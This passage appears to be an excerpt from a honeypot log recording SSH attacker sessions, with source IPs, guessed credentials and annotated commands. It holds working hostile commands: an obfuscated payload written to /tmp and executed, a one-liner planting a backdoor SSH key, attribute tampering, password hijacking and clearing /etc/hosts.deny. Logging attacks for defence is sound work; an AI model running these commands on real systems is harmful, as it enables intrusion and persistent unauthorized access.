5fZUVfDmgvDJLppbMZbOFjDmLCA=; fi; echo 12345 > /tmp/.opass; chmod +x /tmp/beIWSOkJLO && /tmp/beIWSOkJLO KeDp0CJbXTzO7fVXSvfo2jpaWzzV//FcUe7u1T1EWzjW8fJUUvrn1jhbSj3Q6e5TUO7t0SJYWTva6fBVVPX/1DtEUjrO7vdSSvLv2TZcWj3T7OBVUfLx0T9cRD7S6O5VVvbl2D9eXizR5/BKU/bx0T9dRD/X5fZUVfPqwD1aXCLR7e5VUvHx0TpTUDvW5/JEUPfx0T5bRD3Y6+5VV/jl2TRYWSzR6vRKXPPx0j1bRD7T5fldV/T/2CJYWzTO7fJRSvTt2jpaWzzR//RTSvLr0iJfUiLY6/pSVPHv2SxSRD7R6O5WVPPx0j9SUDvV7fFEVfHtzj1YXiLT7O5cU/rp0D1eXSzU5u5WV/Px0jhSRDnX5fZSV/n/1DtEUzXO7vlTSvLr2DZcUj/W//RTSvHu1CJSWSLR6fdeU/Lv1CxcWiLR6PBKVvXszjtdUDrQ7vBRRPHn1SJbXz3O7vRSSvLv1jZSXDjR//JUVu7m0SJYXjzO7vReUvHs0ixeXSLR7fFKVfjrzj1ZUjbZ5/JXRPHq1CJSWSLS7vFKVvPl2TVZXizR7/ZKU/Tx0j1EWD/X5fZUVfDqwDhdRDXZ8fFdU+7t1DRQXDTT6eBQU+7t0zVEWzvR8fFVXPro1TpfSj3R6e5VUvnx1TREWDzS5fZQVvn/0TlYRD3T6e5WVvfx0T5cUDTT6/REUPfx0j9TRD7O7fReXPnv0yxeXSLY6e5VU/bx0jxTUDrQ7vNXRPHu0iJbWDjO7PNKXPfl1jxbXjvA6/dKVvTtzjlSRDTU5fZUVfDmgvDJLppbMZbOFjDmLCA=" & // payload download from C2
$ head -c 3716336 > /tmp/cHq1n6Kj0Q // execute from /tmp
🎭 eagle_root_33 (138.197.24.70) β€” Clifton, United States Β· 1 session Β· 20 cmds
2026-05-24 13:51 EDT Β· as titu/Ahgf3487@rtjhskl854hd47893@#a4nC
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Ahgf3487@rtjhskl854hd47893@#a4nC\ndh4SdxRh31qq\ndh4SdxRh31qq"|passwd|bash
$ Enter new UNIX password:
$ echo "Ahgf3487@rtjhskl854hd47893@#a4nC\ndh4SdxRh31qq\ndh4SdxRh31qq\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 capoeira_root_9 (187.72.128.177) β€” RibeirΓ£o Corrente, Brazil Β· 1 session Β· 19 cmds
2026-05-24 12:50 EDT Β· as root/1qaz@WSX.
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:hfjf431e40lh"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cowboy_3 (142.93.127.224) β€” North Bergen, United States Β· 1 session Β· 1 cmd
2026-05-24 12:42 EDT Β· as jimster/Jimster2023.
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 windmill_3 (188.90.65.252) β€” The Hague, Netherlands Β· 1 session Β· 20 cmds
2026-05-24 12:40 EDT Β· as postfixtester/12345678
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "12345678\nwvvmYtIAZvng\nwvvmYtIAZvng"|passwd|bash
$ Enter new UNIX password:
$ echo "12345678\nwvvmYtIAZvng\nwvvmYtIAZvng\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 sakura_root_5 (202.215.35.86) β€” Motobuto, Japan Β· 1 session Β· 19 cmds
2026-05-24 12:17 EDT Β· as root/welcome123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:3ebvNFUP6KNG"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_68 (150.95.25.110) β€” Bangkok, Thailand Β· 1 session Β· 1 cmd
2026-05-24 11:58 EDT Β· as jimster/1
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 bistro_root_6 (157.173.114.244) β€” Lauterbourg, France Β· 1 session Β· 1 cmd
2026-05-24 11:57 EDT Β· as root/Jimster2025$
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 rogue_root_69 (43.160.210.225) β€” Singapore, Singapore Β· 1 session Β· 20 cmds
2026-05-24 11:52 EDT Β· as micro/micro
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "micro\nWOK2bJR0lbcT\nWOK2bJR0lbcT"|passwd|bash
$ Enter new UNIX password:
$ echo "micro\nWOK2bJR0lbcT\nWOK2bJR0lbcT\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_63 (64.89.161.140) β€” Schieren, Luxembourg Β· 1 session Β· 1 cmd
2026-05-24 11:40 EDT Β· as root/password
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a ; echo 'vT'
🎭 shadow_10 (117.1.85.172) β€” Hanoi, Vietnam Β· 1 session Β· 1 cmd
2026-05-24 11:02 EDT Β· as jimster/2026@Jimster
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 specter_root_63 (159.138.6.134) β€” Hong Kong, Hong Kong Β· 1 session Β· 1 cmd
2026-05-24 10:57 EDT Β· as root/jimster!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 hanbok_root_11 (210.183.21.53) β€” Hwaseong-si, South Korea Β· 1 session Β· 20 cmds
2026-05-24 10:42 EDT Β· as serv/serv
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "serv\nkadV6WsmK5NM\nkadV6WsmK5NM"|passwd|bash
$ Enter new UNIX password:
$ echo "serv\nkadV6WsmK5NM\nkadV6WsmK5NM\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 baguette_root_7 (213.32.22.251) β€” Roubaix, France Β· 1 session Β· 20 cmds
2026-05-24 10:32 EDT Β· as webapp/webapp
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "webapp\n6t9teMFZpVA9\n6t9teMFZpVA9"|passwd|bash
$ Enter new UNIX password:
$ echo "webapp\n6t9teMFZpVA9\n6t9teMFZpVA9\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 fog_root_2 (86.53.186.131) β€” City of London, United Kingdom Β· 1 session Β· 1 cmd
2026-05-24 10:12 EDT Β· as root/20192019
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 chateau (148.230.112.50) β€” Paris, France Β· 1 session Β· 1 cmd
2026-05-24 10:09 EDT Β· as jimster/@2026Jimster
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 beefeater (62.30.72.133) β€” Brentwood, United Kingdom Β· 1 session Β· 1 cmd
2026-05-24 09:31 EDT Β· as jimster/jimster123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 panda_root_18 (14.103.117.77) β€” Beijing, China Β· 2 sessions Β· 39 cmds
2026-05-24 08:24 EDT Β· as root/password1!, user/1qazxsw2
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:z7vjkkNBUOPY"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "1qazxsw2\n8p29eD665Y0E\n8p29eD665Y0E"|passwd|bash
$ Enter new UNIX password:
$ echo "1qazxsw2\n8p29eD665Y0E\n8p29eD665Y0E\n"|passwd
🎭 panda_root_19 (14.103.127.195) β€” Haidian, China Β· 1 session Β· 6 cmds
2026-05-24 08:34 EDT Β· as postgres/admin123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ echo β†’ Enter
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "admin123\nDFihj4uDGf2W\nDFihj4uDGf2W"|passwd|bash
$ Enter new UNIX password:
$ echo "admin123\nDFihj4uDGf2W\nDFihj4uDGf2W\n"|passwd
🎭 blitz_root_11 (82.115.20.17) β€” Frankfurt am Main, Germany Β· 3 sessions Β· 59 cmds
2026-05-24 07:53 EDT Β· as deploy/admin@123, root/00998877, testuser/123123123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:7gXAR0eDAxtz"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "123123123\nU8TpAnkBZxiM\nU8TpAnkBZxiM"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "123123123\nU8TpAnkBZxiM\nU8TpAnkBZxiM\n"|passwd
$ echo -e "admin@123\nhtp0uZ4TBw3X\nhtp0uZ4TBw3X"|passwd|bash
$ echo "admin@123\nhtp0uZ4TBw3X\nhtp0uZ4TBw3X\n"|passwd
🎭 panda_root_20 (39.129.90.146) β€” Guangzhou, China Β· 1 session Β· 20 cmds
2026-05-24 08:26 EDT Β· as myuser/1
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1\nXadHxPz7S1zR\nXadHxPz7S1zR"|passwd|bash
$ Enter new UNIX password:
$ echo "1\nXadHxPz7S1zR\nXadHxPz7S1zR\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_75 (103.199.16.90) β€” Vinhomes Times City, Vietnam Β· 3 sessions Β· 59 cmds
2026-05-24 08:03 EDT Β· as deploy/admin@123, root/00998877, testuser/123123123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "admin@123\nzOOL0xrhPL6T\nzOOL0xrhPL6T"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "admin@123\nzOOL0xrhPL6T\nzOOL0xrhPL6T\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "123123123\nWvkmcbQ1obhT\nWvkmcbQ1obhT"|passwd|bash
$ echo "123123123\nWvkmcbQ1obhT\nWvkmcbQ1obhT\n"|passwd
$ echo "root:hvyRYOAXOFv8"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 tsar_root_7 (80.93.63.227) β€” St Petersburg, Russia Β· 1 session Β· 20 cmds
2026-05-24 08:19 EDT Β· as testuser/test
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
